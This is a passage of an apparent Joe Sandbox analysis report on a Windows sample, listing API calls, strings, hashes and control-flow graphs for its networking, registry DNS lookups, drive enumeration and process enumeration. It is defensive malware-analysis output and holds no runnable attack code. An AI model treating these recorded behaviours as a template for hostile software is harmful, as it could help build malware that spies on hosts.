                                                            • RegEnumKeyExA.KERNELBASE ref: 0104AE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0104AE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0104AE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0104AF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0104AFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0104B072
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4281207131-1047472027
                                                            • Opcode ID: 3b65e519001507b173fe5935100818a4d667ee19a38de370e9bf9bbace7a4f7c
                                                            • Instruction ID: 008f21d01f417cd7231376cf71767b298838851c9d1de9f2fbbcb2e42f9a728b
                                                            • Opcode Fuzzy Hash: 3b65e519001507b173fe5935100818a4d667ee19a38de370e9bf9bbace7a4f7c
                                                            • Instruction Fuzzy Hash: 20729FB1644341EFE760DB28CCC1B6B7BE8EF85700F145868F9869B291E771E944CB62
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00FCA832
                                                            Strings
                                                            • @, xrefs: 00FCA8F4
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00FCA796
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00FCAE1F
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00FCADAC
                                                            • Trying [%s]:%d..., xrefs: 00FCA689
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00FCAD0A
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00FCA871
                                                            • @, xrefs: 00FCAC42
                                                            • cf-socket.c, xrefs: 00FCA5CD, 00FCA735
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00FCAE60
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00FCA6CE
                                                            • Trying %s:%d..., xrefs: 00FCA7C2, 00FCA7DE
                                                            • bind failed with errno %d: %s, xrefs: 00FCB080
                                                            • Local port: %hu, xrefs: 00FCAF28
                                                            • Bind to local port %d failed, trying next, xrefs: 00FCAFE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 6c9d086fcc98876183dca4e7fef59c492c2e82dfe38a789ce95df552fceb1398
                                                            • Instruction ID: 15d65888f861584b446fb18721e2549932119c8b2a9af31002b8d5b64e6f902b
                                                            • Opcode Fuzzy Hash: 6c9d086fcc98876183dca4e7fef59c492c2e82dfe38a789ce95df552fceb1398
                                                            • Instruction Fuzzy Hash: 70621371908346ABE721CF24CD46FABB3E4BF80318F04491DF98997292E775A844DB93

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 01059946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 01059974
                                                            • RegCloseKey.KERNELBASE(?), ref: 0105998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: cd56e5ca82fef192f043831ada77686394ccca1104091d5f945766101bec0d91
                                                            • Instruction ID: 12848d04c890b11957121100d4a93a5775625f72c6e91e7ce17b45f446567c36
                                                            • Opcode Fuzzy Hash: cd56e5ca82fef192f043831ada77686394ccca1104091d5f945766101bec0d91
                                                            • Instruction Fuzzy Hash: 6F32D7F5904202EBEB91AB24EC81B5B77E4AF54318F084474FD8997252FB35E924C7A3

                                                            Control-flow Graph

                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00FC8C30
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00FC8CF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: b128b0028956485cc36229ef7ca1ab6bd8b68413715e8862f68602f9a4fd1ae2
                                                            • Instruction ID: 498caf14f15984e460945ce2fcd0cefc79e991b93941bc38db7e0d6af4946652
                                                            • Opcode Fuzzy Hash: b128b0028956485cc36229ef7ca1ab6bd8b68413715e8862f68602f9a4fd1ae2
                                                            • Instruction Fuzzy Hash: 2FB1B270A04307AFD710CF24CA86FA677A0AF85364F08852DE85A4B2D2DB75EC46E761

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: CloseEnumOpen
                                                            • String ID: d
                                                            • API String ID: 1332880857-2564639436
                                                            • Opcode ID: 5624e527ce10b6c856df8dc19cb898a527ccdd3579ee7753f3d34a8681fc8bdc
                                                            • Instruction ID: 1d0ae998e79f3461db8403d3ea5b2a77729ecf33e2ea12a3d6da424c5938d5fb
                                                            • Opcode Fuzzy Hash: 5624e527ce10b6c856df8dc19cb898a527ccdd3579ee7753f3d34a8681fc8bdc
                                                            • Instruction Fuzzy Hash: 0671E7B490431A9FDB50DF69C88479EBBF0BF84308F11886DE89897310D7749A88CF92

                                                            Control-flow Graph

                                                            control_flow_graph 1173 fc9290-fc92ed call f976a0 1176 fc93c3-fc93ce 1173->1176 1177 fc92f3-fc92fb 1173->1177 1184 fc93e5-fc9427 call fad090 call fd4f40 1176->1184 1185 fc93d0-fc93e1 1176->1185 1178 fc93aa-fc93af 1177->1178 1179 fc9301-fc9333 call fad8c0 call fad9a0 1177->1179 1182 fc93b5-fc93bc 1178->1182 1183 fc9456-fc9470 1178->1183 1197 fc9335-fc9364 WSAIoctl 1179->1197 1198 fc93a7 1179->1198 1187 fc93be 1182->1187 1188 fc9429-fc9431 1182->1188 1184->1183 1184->1188 1185->1182 1189 fc93e3 1185->1189 1187->1183 1192 fc9439-fc943f 1188->1192 1193 fc9433-fc9437 1188->1193 1189->1183 1192->1183 1196 fc9441-fc9453 call fd50a0 1192->1196 1193->1183 1193->1192 1196->1183 1201 fc939b-fc93a4 1197->1201 1202 fc9366-fc936f 1197->1202 1198->1178 1201->1198 1202->1201 1205 fc9371-fc9390 setsockopt 1202->1205 1205->1201 1206 fc9392-fc9395 1205->1206 1206->1201
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00FC935D
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00FC9388
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: 480cefe8dcdf7c89fee720ccaf87e5a0af12d985c4945a2b5b324dd89d112b63
                                                            • Instruction ID: c84a44effee66c8c3b99953976a86fd472bd1a86c1294611fe70c3b035535c2e
                                                            • Opcode Fuzzy Hash: 480cefe8dcdf7c89fee720ccaf87e5a0af12d985c4945a2b5b324dd89d112b63
                                                            • Instruction Fuzzy Hash: AA511370A04306ABE714DF24CD86FAAB7A5FF84324F14852CFD489B282E774E951CB51

                                                            Control-flow Graph

                                                            control_flow_graph 1207 f976a0-f976be 1208 f976c0-f976c7 1207->1208 1209 f976e6-f976f2 send 1207->1209 1208->1209 1210 f976c9-f976d1 1208->1210 1211 f9775e-f97762 1209->1211 1212 f976f4-f97709 call f972a0 1209->1212 1213 f9770b-f97759 call f972a0 call f9cb20 call 1318c50 1210->1213 1214 f976d3-f976e4 1210->1214 1212->1211 1213->1211 1214->1212
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00F93D4E,00000000,?,?,00FA07BF), ref: 00F976EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 4dc65f4245d373877cf7cb9c0d64911b785fad94fe04fa939d3f99721083e17d
                                                            • Instruction ID: 807074c16f5683b31e0bd53c420c0fa30c8912de4b810723f333866dde1389a8
                                                            • Opcode Fuzzy Hash: 4dc65f4245d373877cf7cb9c0d64911b785fad94fe04fa939d3f99721083e17d
                                                            • Instruction Fuzzy Hash: 871127B1A193047BF6316BA59C46D277B9CEBC2B38F550909F8086B381D1669C1097B2

                                                            Control-flow Graph

                                                            control_flow_graph 1345 f975e0-f975ed 1346 f975ef-f975f6 1345->1346 1347 f97607-f97629 socket 1345->1347 1346->1347 1348 f975f8-f975ff 1346->1348 1349 f9762b-f9763c call f972a0 1347->1349 1350 f9763f-f97642 1347->1350 1351 f97601-f97602 1348->1351 1352 f97643-f97699 call f972a0 call f9cb20 call 1318c50 1348->1352 1349->1350 1351->1347
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: 359e259c7e87e8d1aef7de858bce2851620b4edf29d255d256559c8ef20a976d
                                                            • Instruction ID: 9944fae2481f9e41a6bbb1e78f2177032270f5f23daad82309b4f09ac1c84548
                                                            • Opcode Fuzzy Hash: 359e259c7e87e8d1aef7de858bce2851620b4edf29d255d256559c8ef20a976d
                                                            • Instruction Fuzzy Hash: E8114876A2431137EB316A6EAC16F9B3F88EFD1B34F441919F818A62D2D2118C64D7E1

                                                            Control-flow Graph

                                                            control_flow_graph 1634 1318e90-1318eb8 _open 1635 1318eba-1318ec7 1634->1635 1636 1318eff-1318f2c call 1319f70 1634->1636 1637 1318ef3-1318efa call 1318d20 1635->1637 1638 1318ec9 1635->1638 1646 1318f39-1318f51 call 1318ca8 1636->1646 1637->1636 1640 1318ee2-1318ef1 1638->1640 1641 1318ecb-1318ecd 1638->1641 1640->1637 1640->1638 1644 1421670-1421687 1641->1644 1645 1318ed3-1318ed6 1641->1645 1647 142168a-14216b1 1644->1647 1648 1421689 1644->1648 1645->1640 1649 1318ed8 1645->1649 1652 1318f30-1318f37 1646->1652 1653 1318f53-1318f5e call 1318cc0 1646->1653 1654 14216b9-14216bf 1647->1654 1649->1640 1652->1646 1652->1653 1653->1635 1656 14216c1-14216cf 1654->1656 1657 14216d9-14216fb 1654->1657 1659 14216d5-14216d8 1656->1659 1661 1421706-142171b 1657->1661 1662 14216fd-1421704 1657->1662 1661->1656 1662->1661 1663 142171d-1421732 1662->1663 1663->1659
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: _open
                                                            • String ID: terminated$@
                                                            • API String ID: 4183159743-3016906910
                                                            • Opcode ID: bcd1dd2b2100d4decb979a3bd260bee5c9dc825c69d1cc2fa6e5f98db3b20653
                                                            • Instruction ID: 1aba1ee0ff4fe5519e7c35931efc1487b6b44c6d4d7579fc24d1e9419528e0b0
                                                            • Opcode Fuzzy Hash: bcd1dd2b2100d4decb979a3bd260bee5c9dc825c69d1cc2fa6e5f98db3b20653
                                                            • Instruction Fuzzy Hash: 8D4177B09083058FDB14EF79D84466FBBE4AF88358F448A2DE899D7354E334C845CB6A

                                                            Control-flow Graph

                                                            control_flow_graph 1666 fca150-fca159 1667 fca15f-fca17b 1666->1667 1668 fca250 1666->1668 1669 fca249-fca24f 1667->1669 1670 fca181-fca1ce getsockname 1667->1670 1669->1668 1671 fca1f7-fca214 call fcef30 1670->1671 1672 fca1d0-fca1f5 call fad090 1670->1672 1671->1669 1676 fca216-fca23b call fad090 1671->1676 1680 fca240-fca246 call fd4f40 1672->1680 1676->1680 1680->1669
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00FCA1C7
                                                            Strings
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FCA23B
                                                            • getsockname() failed with errno %d: %s, xrefs: 00FCA1F0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: d3965cbfa22efb7f0c326dedc3c4e3ad5b74c3dbd0813a33a69ab1577dbb0350
                                                            • Instruction ID: b2b7e0571276bf2df24f38badf0dabb79162e2da4513f3f29f89146e71e355ca
                                                            • Opcode Fuzzy Hash: d3965cbfa22efb7f0c326dedc3c4e3ad5b74c3dbd0813a33a69ab1577dbb0350
                                                            • Instruction Fuzzy Hash: E021E671C08285AAF7229B58DC43FE673ACEF91338F040618F99853151FA32698587E2
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00FAD65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: 9416c5272a1852f5b5c30c57ef3be5df5a39df6f93f46f317acef136f3a2eb6b
                                                            • Instruction ID: 8b2469b1c47fe36f21549643d1e9d7b2947271e0e25991ea0ddb9b99b052cc99
                                                            • Opcode Fuzzy Hash: 9416c5272a1852f5b5c30c57ef3be5df5a39df6f93f46f317acef136f3a2eb6b
                                                            • Instruction Fuzzy Hash: F6017BD0D4434106F7127B38AC1B32632947F93304F442868EC8D96386F72CC59DC2A2
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0105AB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0105ABE4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: 71183ecaff37a0f63b1a221624d9aba0dfcdfe01732d227d833cb7f2f2c606a1
                                                            • Instruction ID: 9f477d075a56363eff10468d0b548121e29df193ff784a0b7eb60d4088808a3d
                                                            • Opcode Fuzzy Hash: 71183ecaff37a0f63b1a221624d9aba0dfcdfe01732d227d833cb7f2f2c606a1
                                                            • Instruction Fuzzy Hash: 99E19F70704302DBEB60CF18C884B6B7BE5EF85310F044A69EED99B291E775D944DB92
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: d4ff37a2266f47f711cf677ab14b7eac539623ee5165234120d656c013c99fa0
                                                            • Instruction ID: 419899716bfb45b776ddd880fb137b869df1a2dd25d989ce26b4b5b20be50058
                                                            • Opcode Fuzzy Hash: d4ff37a2266f47f711cf677ab14b7eac539623ee5165234120d656c013c99fa0
                                                            • Instruction Fuzzy Hash: 14416EEB64C311BE73C285956B58FFA6B6DE5CA730330A426F403D6583E2E44ACE11B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E0033D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175554813.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 0cc153a6aaa39fc333b909f236dcdbfb775079d89e51f818ce26ec18cf7603e8
                                                            • Instruction ID: ba6393441ad84a9606e27662a767a895c4dbdfd49dd3919e123c9b486493ba4a
                                                            • Opcode Fuzzy Hash: 0cc153a6aaa39fc333b909f236dcdbfb775079d89e51f818ce26ec18cf7603e8
                                                            • Instruction Fuzzy Hash: 3621B6AB608310BEB38385D15748BFA6B6DE9DB2303309472F503D6586E5D84FCA62B1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: 86b1794bacd3f7fde29cf329943c71c31ca51680854e2f5600c658aef4916d03
                                                            • Instruction ID: 3941fdf8cffd2256fce8c548f47e7333fbf3eaae9b901ff682a2ced05fc776f8
                                                            • Opcode Fuzzy Hash: 86b1794bacd3f7fde29cf329943c71c31ca51680854e2f5600c658aef4916d03
                                                            • Instruction Fuzzy Hash: F8D05E33A293212B9A306A997C48C4B7BA8DEC6F60F060C59F9457B204E1209D0487F2
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0105B29E,?,00000000,?,?), ref: 0105B0BA
                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01043C41,00000000), ref: 0105B0C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2173424419.0000000000F91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f90000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnect
                                                            • String ID:
                                                            • API String ID: 374722065-0
                                                            • Opcode ID: d4b6802b637837e84782a744ab508d89a84ee872099aa641bd80e73875557c55
                                                            • Instruction ID: 5b42ccf64779b2443a8be2c95f3e4e9234dd8249d41e418309aa3eae958287d1
                                                            • Opcode Fuzzy Hash: d4b6802b637837e84782a744ab508d89a84ee872099aa641bd80e73875557c55
                                                            • Instruction Fuzzy Hash: F401D8363042009BDB605A68CC44F6BB7DAFF89274F140B54FDB8931D1D726F9508752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31e9d3a6fabb4b16daac631f62ecde79da7ffcaafa16c1893070da42ea321237
                                                            • Instruction ID: 13abdf9170edb1f3e8d9cb160c758c58185981cf949a60e85f704d4acd20cc14
                                                            • Opcode Fuzzy Hash: 31e9d3a6fabb4b16daac631f62ecde79da7ffcaafa16c1893070da42ea321237
                                                            • Instruction Fuzzy Hash: 995118EB10C3517DB382E7A17B54EFA6B6EE6D6370331943AF503C6242E2990E4E51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 60fff3d11be418c1b4e2d0a22c3dfae3152c3b962bd12a85ede20c774e138814
                                                            • Instruction ID: ddbd922ea971e587164da7d7c919c374d2a80e5e225ff580b3d6b9c7e5461237
                                                            • Opcode Fuzzy Hash: 60fff3d11be418c1b4e2d0a22c3dfae3152c3b962bd12a85ede20c774e138814
                                                            • Instruction Fuzzy Hash: E651C5EB14C310BDB3C2A6A17B54AFA6B6EE6D27707319436F603C6642E2944F4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7a3f0697af8c074cc99b35db46919ab5eab483686ba4b7384c67bef3675409a
                                                            • Instruction ID: 8362c714617fdf88db4f7b0fdb4cee16f28a075e6c9f1ec235c72a220af7018a
                                                            • Opcode Fuzzy Hash: c7a3f0697af8c074cc99b35db46919ab5eab483686ba4b7384c67bef3675409a
                                                            • Instruction Fuzzy Hash: 5B51B4EB10C310BDB2C2A6A17B54AFB6B6EE6D27707319436F607C6642E2944F4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 18eef4aef4e22d3fa3da4722bef84ad485eb2f7d825fc2836245c15ab4eb7dfe
                                                            • Instruction ID: dff184fed6f35ba7a9509ef7e39a72aef3657324f046466e101c1e78414309bb
                                                            • Opcode Fuzzy Hash: 18eef4aef4e22d3fa3da4722bef84ad485eb2f7d825fc2836245c15ab4eb7dfe
                                                            • Instruction Fuzzy Hash: AD51B5EB10C311BDB2C2A6617B54AFB6B6EE6D27707319436F603C2642E2944F4E51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6f672f1316e1ca76044a7665d554abdd597d3ad96f891666f5759093930bf35e
                                                            • Instruction ID: 6754712081d230bc5d7f0a7969e087b2f6c56a67e5c587e618461bc13c1727af
                                                            • Opcode Fuzzy Hash: 6f672f1316e1ca76044a7665d554abdd597d3ad96f891666f5759093930bf35e
                                                            • Instruction Fuzzy Hash: 7D51A3EB14C311BDB282A6A17F54AFB6B6EE6D27707319436F603C2642E2940F4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 135839c48b22c1f35942105d335f70e0d94c365cb57fd727504db0d31395b416
                                                            • Instruction ID: ca546098ad56c0f999e8e0ed328663f490f98eec0de82b4e4afb46f2befa4957
                                                            • Opcode Fuzzy Hash: 135839c48b22c1f35942105d335f70e0d94c365cb57fd727504db0d31395b416
                                                            • Instruction Fuzzy Hash: 0D51D6EB14C3117DB282A6A17F54EFB6B6EE6D2770731A436F503C2642E2944E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 26043ceef993079600da72eb03695c0e68f5eb934ad87ef4ca27f78e486c8cff
                                                            • Instruction ID: d7088899c2802f38c9ff1ba1f0a5197502907d5b2913335a99c5fac993f13492
                                                            • Opcode Fuzzy Hash: 26043ceef993079600da72eb03695c0e68f5eb934ad87ef4ca27f78e486c8cff
                                                            • Instruction Fuzzy Hash: 1E51B5EB14C3117DB282A6A17F14EFB6B6EE6D27707319436F503C2642E2984E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 9987eb95ee9de4861ff5596fc7d3cad80f1247c69b5119d8931a90f79b7bc55b
                                                            • Instruction ID: 047e5b1dba96e3ccc3a910ebfc329c1ed8263177252a4d16b4ebf3a17d2c7b46
                                                            • Opcode Fuzzy Hash: 9987eb95ee9de4861ff5596fc7d3cad80f1247c69b5119d8931a90f79b7bc55b
                                                            • Instruction Fuzzy Hash: 6A51A3EB14C3117DB282A6A17F58FFB6B6EE6D27707319436F603C2542E2984E4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a149b22fc039c9f0e75d94f366c266924583c5fc941e723b400385c92c9cab10
                                                            • Instruction ID: 4dea5b35e8ce21185366e77dd65945544dd479bc8c37d36fc6ed69a7e2896de8
                                                            • Opcode Fuzzy Hash: a149b22fc039c9f0e75d94f366c266924583c5fc941e723b400385c92c9cab10
                                                            • Instruction Fuzzy Hash: D651E3EB14C3117DB282A6A13B58FFB6B6EE6D27707319436F603C6542E2880F4E50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2175655675.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e40000_f7qbEfJl0B.jbxd
                                                            Similarity
